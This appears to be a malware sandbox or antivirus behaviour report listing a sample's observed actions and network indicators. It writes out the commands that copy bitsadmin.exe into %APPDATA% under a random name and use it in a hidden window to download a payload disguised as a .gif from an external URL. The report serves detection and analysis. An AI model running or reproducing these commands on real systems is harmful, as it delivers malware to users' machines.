Technical Information
- '%APPDATA%\rsfpcsjc.exe' /transfer kpSisH /download https://traquick.com/nesq/MSCNGL74B04B639U/gstatic.gif %APPDATA%\gstatic.gif
- %APPDATA%\rsfpcsjc.exe
- 'tr###ick.com':443
- DNS ASK tr###ick.com
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\rSFPcsJc.exe' (with hidden window)
- '%APPDATA%\rsfpcsjc.exe' /transfer kpSisH /download https://traquick.com/nesq/MSCNGL74B04B639U/gstatic.gif %APPDATA%\gstatic.gif' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\rSFPcsJc.exe